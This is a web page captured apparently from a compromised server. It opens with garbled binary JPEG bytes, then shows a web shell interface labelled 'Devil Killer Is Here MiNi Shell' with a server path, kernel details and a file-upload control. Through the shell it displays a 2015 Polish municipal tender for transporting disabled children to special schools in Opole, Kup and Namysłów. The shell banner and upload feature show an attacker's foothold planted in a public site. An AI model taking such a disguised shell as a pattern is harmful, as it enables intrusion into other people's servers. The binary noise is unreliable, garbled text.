JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150618/147820-N-2015.html

<p class="kh_header"><b>Murów: Dowóz uczniów i dzieci niepełnosprawnych do  szkół specjalnych i placówek opiekuńczo-wychowawczych  poza teren Gminy Murów.</b><br>
<b>Numer ogłoszenia: 147820 - 2015; data zamieszczenia: 18.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów i dzieci niepełnosprawnych do  szkół specjalnych i placówek opiekuńczo-wychowawczych  poza teren Gminy Murów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  bezpieczny i punktualny dowóz uczniów i dzieci niepełnosprawnych  do szkół specjalnych i placówek  opiekuńczo-wychowawczych  znajdujących się na terenie: Opola, Kup,  i Namysłowa w roku szkolnym 2015/2016.
Przewóz dotyczy wszystkich dni, w których odbywać się będą zajęcia dydaktyczne, opiekuńcze i wychowawcze w roku szkolnym 2015/2016 ( 01.09.2015r. - 30.06.2016r.)
Wykonawca zobowiązany będzie do zapewnienia opieki nad uczniami i dziećmi w czasie dowozu i w drodze powrotnej oraz zachowania szczególnego bezpieczeństwa w czasie przewozu na  trasach. Planowana liczba dzieci dowożonych - 5
 Faktyczne godziny dowozu i powrotu Wykonawca ustali po otrzymaniu rozkładu zajęć z poszczególnych szkół i przedszkola. Wykonawca podczas świadczenia każdego przewozu zobowiązany jest zapewnić uczniom dodatkowo tj. poza kierowcą, opiekuna.
Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca zdolności do czynności prawnych.
Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: zapewnienia bezpieczeństwa w trakcie przewozu dzieci,  zapewnienie bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dzieci niepełnosprawnych , doprowadzenia i przyprowadzenia z samochodu do szkoły i przedszkola każdego dziecka. W trakcie realizacji usługi oraz w przypadku indywidualnych zmian zajęć szkolnych Wykonawca zobowiązany będzie kontaktować się z Dyrektorami odpowiednich szkół i przedszkola.
W tracie trwania ferii, świąt lub innych wyznaczonych przez dyrekcje placówek oświatowych jako wolne od zajęć przewozy nie będą się odbywały.
Pojazdy muszą być wyposażone w pasy bezpieczeństwa . Z przewozów objętych zamówieniem mogą korzystać tylko dzieci wskazane przez Zamawiającego.
W przypadku awarii wyznaczonego samochodu  Wykonawca podstawi niezwłocznie, nie później jednak niż w ciągu  60 minut od powstania awarii, samochód  spełniający właściwe wymagania techniczne w ruchu drogowym.
W przypadku niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo koszty przewozu wynikłe z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego. 
Pojazdy Wykonawcy muszą posiadać ubezpieczenie OC, NW. 
Uczniów niepełnosprawnych Wykonawca odbiera z domu i po zakończonych zajęciach lekcyjnych dowozi do domu.
Wykonawca winien dowieźć uczniów do szkół  i z powrotem z następujących miejscowości:  
Czarna Woda - do Gimnazjum Specjalnego w Zespole Szkół Specjalnych w Namysłowie ul.  
Staszica 8  - 1 dziecko,
Morcinek -do Zespołu Szkół Specjalnych  w Opolu ul. Książąt Opolskich 21 - 1 dziecko,
Murów - do Zespołu Szkół Specjalnych w Opolu ul. Książąt Opolskich 21 - 1 dziecko,
Murów- do Zespołu Niepublicznych Szkół w Kup ( Niepubliczne Przedszkole ) ul. Karola Miarki 10-12  - 2 dzieci

 Miejsce wykonywania zamówienia
   
  1. Gimnazjum Specjalne w Zespole Szkół Specjalnych w Namysłowie ul. Staszica 8
  2. Zespół Szkół Specjalnych w Opolu ul. Książąt Opolskich 21
  3. Zespół Niepublicznych Szkół w Kup  ( Niepubliczne Przedszkole ) 
      ul. Karola Miarki 10-12.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.30.00-3, 60.11.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium.
     Ustala się wadium w wysokości: 2.100,00PLN słownie:dwa tysiące sto złotych 
 2. Wadium należy wnieść przed terminem składania ofert, określonego  w Rozdziale  
    12 niniejszej SIWZ, przy czym za termin wniesienia  wadium w formie 
     pieniężnej za pomocą przelewu bankowego Zamawiający będzie  uważał za 
    skuteczne tylko wówczas, gdy bank prowadzący rachunek  Zamawiającego
    potwierdzi, że otrzymał taki przelew przed upływem terminu  składania ofert. 
 3.   Wadium może być wnoszone w jednej lub kilku następujących formach:
              1)   w pieniądzu,
              2)   w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                   oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze 
                    poręczeniem  pieniężnym,
              3)   w gwarancjach bankowych
              4)   w gwarancjach ubezpieczeniowych,
              5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b 
                  ust.  5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej 
                  Agencji  Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. 
                   zm).
Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem  Wadium - Dowóz dzieci niepełnosprawnych
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za   zgodność z oryginałem - przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu wraz z jego kopią ( potwierdzoną za zgodność z oryginałem) należy dołączyć do oferty. Oryginał należy załączyć do oferty w taki sposób, aby umożliwić zamawiającemu jego wyjęcie i zwrot bez uszkodzenia.          

4. Wadium składane w formie gwarancji i/lub poręczenia, gwarancja i lub poręczenie   
      powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, 
      między  innymi następujące elementy: 
       1)  nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub 
           poręczenia  (Zamawiającego),gwaranta i/lub poręczyciela (banku lub 
           instytucji ubezpieczeniowej  udzielających gwarancji i lub poręczenia) oraz wskazanie ich siedzib.
          2)  dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
          3) precyzyjne określenie wierzytelności, która ma być zabezpieczona 
             gwarancją i lub   poręczeniem,
          4)  kwotę gwarancji i lub poręczenia,
          5)  termin ważności gwarancji i lub poręczenia 
          6) zobowiązanie gwaranta i lub poręczyciela do: nieodwołalnego i 
              bezwarunkowego  zapłacenia kwoty gwarancji i lub poręczenia na pierwsze 
              pisemne żądanie  Zamawiającego zawierającego oświadczenie, iż:
            - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, 
              dokumentów lub pełnomocnictw o którym mowa w art. 26 ust. 3 Ustawy Pzp., nie złożył wymaganych   dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1 Ustawy Pzp. lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji  o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki , o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej chyba, że Wykonawca udowodni, że wynika to z przyczyn nieleżących  po jego stronie, lub
           -  Wykonawca, którego ofertę wybrano odmówił podpisania umowy na 
               warunkach określonych w ofercie , lub
           -  Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego 
               wykonania umowy, lub
            -  zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się 
                niemożliwe z  przyczyn leżących po stronie Wykonawcy;
         7) okres ważności gwarancji i/ lub poręczenia nie może być  krótszy niż okres 
             związania ofert.
5.  Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze 
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem 
     Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. 
6.   Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza 
      Zamawiający     zwróci wadium niezwłocznie po zawarciu umowy .
7.  Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek 
      Wykonawcy, który wycofał ofertę przed terminem składania ofert.
8.   W sprawie wadium obowiązują uregulowania ustawy- Prawo zamówień 
      publicznych  zawarte w art. 45 i 46.
9.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
     wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
10. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
   wadium  (w każdej z dopuszczalnych form) może być wniesione przez jednego, 
      kilku lub   wszystkich Wykonawców, pod warunkiem, iż łączna wysokość 
      wniesionego wadium  odpowiadać będzie wymaganej kwocie. W takim przypadku 
      składając wadium należy  wskazać w imieniu kogo i tytułem jakiego postępowania 
     jest wnoszone.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli   
     przepisy prawa nakładają obowiązek ich posiadania tj; 
     posiadają aktualną licencję na wykonywanie na przewóz osób pojazdami
     samochodowymi, zgodnie z Ustawą z dnia 6 września 2001r. o transporcie     
     drogowym  (t.j Dz.U. z 2013r.  poz. 1414 z późn. zm.)  
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia-  nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, tj. wykonali, a w przypadku świadczeń okresowych   lub ciągłych również wykonywanych usług  w okresie ostatnich trzech  lat przed  upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie co najmniej:  jedno  zadanie  polegające na dowozie dzieci  niepełnosprawnych  do szkół lub przedszkoli o wartości minimum 50.000zł brutto.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia- nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają  lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego do wykonania niniejszego zamówienia- dysponują co najmniej: 3 busami  przystosowanymi do przewozu osób. Środki transportu, przeznaczone do  realizacji przewozów osób  zgodnie z § 35 lub 36 rozporządzenia Ministra  Infrastruktury z dnia 22 lipca 2002r. w sprawie rejestracji i oznaczenia pojazdów 
 ( Dz.U z 2007r.nr 186 poz.1322 z późn zm.), pojazdy muszą posiadać ważne badania   techniczne .

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wskazać ,że dysponuje lub będzie dysponował co 
 najmniej 3 kierowcami z uprawnieniami  tj.  posiadają  ważne prawo jazdy kat. D, 
 oraz  ważne świadectwo kwalifikacji lub zaświadczenie oraz min. 3 letnie  doświadczenie w zakresie przewozu osób.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia-  nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku, Zamawiający  uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie  ze wzorem określonym w załączniku nr 2 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
 postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia- nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie - pełnomocnictwo do występowania w imieniu Wykonawcy
 UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas podstawienia zamiennego sprawnego pojazdu- czas reakcji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach.
2. Zmiana może obejmować:
        1) zmiany przez ustawodawcę  wysokości należnych podatków i opłat w 
            szczególności zmiany stawki  podatku VAT,
        2) inną okoliczność prawną, ekonomiczną lub techniczną skutkującą 
           niemożliwością  wykonania lub nienależytym wykonaniem Umowy zgodnie z 
           SIWZ.
        3) wystąpienia wyjątkowych okoliczności , niezależnych od Stron umowy, których nie 
          mogły one przewidzieć w chwili zawierania umowy, a wpływających na realizację 
        4) zmiany podwykonawców, których udział w realizacji przedmiotu umowy
             zaakceptował Zamawiający,
        5) zmiany ilości dowożonych uczniów do szkół i placówek w trakcie trwania umowy, a 
             także zmianą tras spowodowanych zmianą ilości dowożonych uczniów i dzieci.
  3. Warunkiem dokonania zmian, o których mowa w ust. 2 jest złożenie pisemnego wniosku           przez stronę inicjującą zmianę, zawierającego:
      1)   opis propozycji zmiany,
      2)   uzasadnienie zmiany
      3)  obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana   będzie miała wpływ na wynagrodzenie wykonawcy,
      4)  opis wpływu zmiany na terminy wykonania usługi
4.  Dokonanie zmian, wymaga podpisania aneksu do umowy.
5.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
     1)  zmiana danych związanych z obsługą administracyjno- organizacyjną umowy
   2) zmiana danych teleadresowych osób reprezentujących strony lub oznaczenia stron 
         umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
6.  Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
1) stawki podatku od towarów i usług
2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. O minimalnym wynagrodzeniu za pracę,
3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne
4) jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana określona w ust. 6 pkt.2)i3) umowy będzie możliwa pod warunkiem przedstawienia Zamawiającemu - przed przystąpieniem do realizacji niniejszej umowy oraz przy każdej zmianie liczby lub osób pracowników - imiennej listy pracowników oddelegowanych do realizacji przedmiotowej umowy wraz z :
oświadczeniem o zatrudnieniu wskazanych pracowników na umowę o pracę,
wskazaniem wysokości wynagrodzenia poszczególnych osób wraz z możliwością żądania przez Zamawiającego kopii umów o pracę,
wyliczeniem różnicy pomiędzy dotychczasowym wynagrodzeniem a zmianą wynagrodzenia w związku z okolicznościami wymienionymi w ust.6 pkt 2)i3)
